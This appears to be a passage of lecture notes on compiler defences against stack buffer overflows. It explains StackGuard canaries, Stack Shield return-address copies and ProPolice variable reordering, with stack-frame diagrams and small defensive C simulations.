redirect the control flow of the victim program
– Stack Buffer Overflow
– Heap Buffer Overflow
• Inject a segment of malicious shellcode
How to prevent stack buffer overflow?
• Stack Guard
– In the stack, a canary word is placed next to the return address, on the side facing the local variables, whenever a function is called;
– The canary will be checked before the function returns. If the value of the canary has changed, it indicates malicious behavior.

Figure 6. Unix Stack Frame (lower address first):
    Local Variables
    Old Base Pointer
    Canary Value
    Return Address
    Arguments
    (higher address)
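
The canary check can be modeled without touching a real stack. The sketch below is a toy simulation under stated assumptions: the frame is a 16-byte array laid out as buffer (8 bytes), canary (4), return address (4), the saved base pointer is left out for brevity, and all names are hypothetical. It is not how a compiler implements StackGuard; it only shows why a linear overflow that reaches the return address must pass through the canary first.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

enum { BUF_LEN = 8, CANARY_OFF = 8, RET_OFF = 12, FRAME_LEN = 16 };

/* Toy frame, low address first: [buf (8)][canary (4)][ret (4)]. */
struct toy_frame { uint8_t bytes[FRAME_LEN]; };

/* Function entry: place the canary and the return address. */
void frame_init(struct toy_frame *f, uint32_t canary, uint32_t ret)
{
    assert(f != NULL);
    memset(f->bytes, 0, FRAME_LEN);
    memcpy(f->bytes + CANARY_OFF, &canary, sizeof canary);
    memcpy(f->bytes + RET_OFF, &ret, sizeof ret);
}

/* Stands in for an unchecked strcpy into buf. n is clamped to the toy
 * frame so the simulation itself never writes out of bounds. */
void frame_unchecked_write(struct toy_frame *f, const uint8_t *data, size_t n)
{
    assert(f != NULL && data != NULL);
    if (n > FRAME_LEN)
        n = FRAME_LEN;
    memcpy(f->bytes, data, n);
}

/* Function exit: returns 1 if the canary still has its expected value. */
int frame_canary_intact(const struct toy_frame *f, uint32_t expected)
{
    uint32_t seen;
    memcpy(&seen, f->bytes + CANARY_OFF, sizeof seen);
    return seen == expected;
}
```

Writing 8 bytes leaves the canary intact; writing 16 bytes changes both the canary and the return address, so the check at function exit fails before the corrupted address is used.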
Cont.
• Canary can still be intact if the attacker overwrites it with the correct value
– Solution – use “random canary” value
– Use “terminator canary” – consists of all string terminator sequences – NULL, ‘\r’, ‘\n’, -1…
• Attacker can still point to the ‘return address’ and change it, without worrying about the canary
– This is a shortcoming of StackGuard
– Can be dealt with by XORing the canary value and ‘return address’ to detect if ‘return address’ has changed
Stack Shield
• Stack Shield
– Copy RET address into an unoverflowable memory region;
– The values of the two RET addresses will be compared before a function returns;
– If the values are different, then a malicious exploitation has occurred;
– Needs another stack-like data structure to maintain RET addresses.
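
The "stack-like data structure" can be sketched as a small shadow stack: push a copy of the return address on function entry, pop and compare on function exit. The names and the fixed depth below are assumptions for illustration; a real implementation would be emitted by the compiler and would keep the copies in memory an overflow cannot reach.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define SHADOW_DEPTH 64

/* Copies of return addresses, kept apart from the ordinary stack. */
struct shadow_stack {
    uintptr_t saved[SHADOW_DEPTH];
    size_t top;
};

/* Function entry: remember the return address. Returns -1 if full. */
int shadow_push(struct shadow_stack *s, uintptr_t ret)
{
    assert(s != NULL);
    if (s->top == SHADOW_DEPTH)
        return -1;
    s->saved[s->top++] = ret;
    return 0;
}

/* Function exit: pop the saved copy and compare it with the address
 * found on the ordinary stack.
 * Returns 1 if they match, 0 if they differ, -1 if nothing was saved. */
int shadow_check(struct shadow_stack *s, uintptr_t ret_on_stack)
{
    assert(s != NULL);
    if (s->top == 0)
        return -1;
    return s->saved[--s->top] == ret_on_stack;
}
```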
ProPolice
• Perhaps most sophisticated compiler protection
• Rearrange local variables such that char buffers always are allocated at bottom addresses (top of the stack), and are guarded by a Guard Value
• Does not work fine with small buffers – somewhat unstable

Figure 7. Unix Stack Frame (lower address first):
    Local Variables and Pointers
    Local char buffers
    Guard Value
    Old Base Pointer
    Return Address
    Arguments
    (higher address)
